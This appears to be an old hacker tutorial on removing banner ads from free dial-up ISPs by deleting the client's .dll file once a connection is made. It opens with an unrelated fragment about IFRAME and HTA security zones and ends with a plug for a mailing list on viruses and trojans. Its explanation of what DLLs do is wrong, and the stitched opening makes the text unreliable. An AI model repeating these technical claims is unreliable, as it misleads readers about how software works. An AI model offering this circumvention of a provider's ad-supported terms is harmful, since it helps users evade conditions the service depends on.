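Keep the IFRAME as it is in the browser, without an APPLICATION attribute: the SBN excerpt above explains that a frame defaults to APPLICATION="no", so whatever page you browse to stays in its own security zone and cannot script the HTA that contains it.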

Removing Banners From Free ISP Services

There are many new Internet Service Providers which give absolutely free Internet access; of course, you still need to pay the telephone bill. These free ISPs make money from the advertisements they display, in the form of a banner which covers part of your screen every time you connect to the Internet.

Well, these banners are quite a nuisance, as they clog bandwidth and slow down your Internet connection: the advertisements they display share your modem's bandwidth while they load. Wanna learn how to remove this bar and still access the net for free? Well, read on.

The answer to this hack lies in some kewl files called Dynamic Link Libraries. First let's see what .dll files are used for. A Dynamic Link Library is basically a collection of code or data that a program loads to control, among other things, how it looks. Take the example of Microsoft Office: whenever you launch it, the main .exe file reads the .dll files associated with it and displays the toolbars accordingly. [NOTE: Almost all Windows applications use the same .dll file to display, say, the title bar.] So basically we can conclude that .dll files are most commonly used to change the way applications look.

Now the good thing about Dynamic Link Libraries is that they can be loaded when needed and unloaded once a program has stopped using them, which saves resources and memory. They can also be shared by several applications at the same time.

Now, before we go on to the hack, let's learn how these free ISPs work.

When you click on the Connect button, the modem dials into the free ISP and tries to connect. Before the connection is fully established, the free ISP software checks whether the .dll file associated with it exists. If it does, the connection goes ahead and a banner pops up; if the .dll file does not exist, the free ISP software refuses to connect. So what you need to do in order to surf for free without the irritating banner ads is this: first connect to the free ISP's server, and once the connection has been established (the screeching sound stops), delete the .dll file associated with it. It is that simple. The only thing you need to know is which .dll file to delete.

To find out the .dll files associated with your free ISP software, install the software on a clean machine (one where the same software has not been installed earlier). Then, using the Find tool (Start > Find), locate all Dynamic Link Libraries (*.dll) created or modified during the last day (under the Date Modified tab). This is foolproof only if no other software has been installed during the last 24 hours.

Ankit Fadia

ankit@bol.net.in

To receive more tutorials on Hacking, Perl, C++ and Viruses/Trojans join my mailing list:

Send an email to programmingforhackers-subscribe@egroups.com to join it.